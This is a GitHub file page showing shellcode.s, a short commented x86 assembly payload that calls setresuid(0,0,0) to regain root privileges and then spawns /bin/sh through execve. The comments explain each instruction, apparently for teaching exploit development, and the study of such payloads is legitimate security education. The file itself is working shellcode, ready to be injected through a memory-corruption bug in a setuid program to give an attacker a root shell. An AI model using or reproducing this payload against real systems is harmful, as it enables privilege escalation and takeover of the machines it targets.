-
Notifications
You must be signed in to change notification settings - Fork 171
/
Copy pathshellcode.s
22 lines (20 loc) · 1.01 KB
/
shellcode.s
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
BITS 32
; setresuid(uid_t ruid, uid_t euid, uid_t suid);
xor eax, eax ; zero out eax
xor ebx, ebx ; zero out ebx
xor ecx, ecx ; zero out ecx
cdq ; zero out edx using the sign bit from eax
mov BYTE al, 0xa4 ; syscall 164 (0xa4)
int 0x80 ; setresuid(0, 0, 0) restore all root privs
; execve(const char *filename, char *const argv [], char *const envp[])
push BYTE 11 ; push 11 to the stack
pop eax ; pop dword of 11 into eax
push ecx ; push some nulls for string termination
push 0x68732f2f ; push "//sh" to the stack
push 0x6e69622f ; push "/bin" to the stack
mov ebx, esp ; put the address of "/bin//sh" into ebx, via esp
push ecx ; push 32-bit null terminator to stack
mov edx, esp ; this is an empty array for envp
push ebx ; push string addr to stack above null terminator
mov ecx, esp ; this is the argv array with string ptr
int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])